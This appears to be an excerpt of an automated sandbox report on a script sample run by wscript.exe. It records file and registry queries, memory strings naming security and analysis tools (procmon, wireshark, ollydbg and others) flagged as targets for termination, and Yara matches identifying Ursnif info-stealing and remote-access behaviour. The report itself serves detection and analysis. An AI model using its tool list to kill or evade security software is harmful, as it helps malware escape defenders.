Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\textual.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\textual.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\textual.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\textual.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: autoruns.exe
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: regmon.exe
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.374917949.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.374965173.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375131455.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375076208.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375019084.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375052638.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375106065.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.374881128.0000000005F18000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.374917949.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.374965173.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375131455.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375076208.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375019084.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375052638.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375106065.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.374881128.0000000005F18000.00000004.00000040.sdmp, type: MEMORY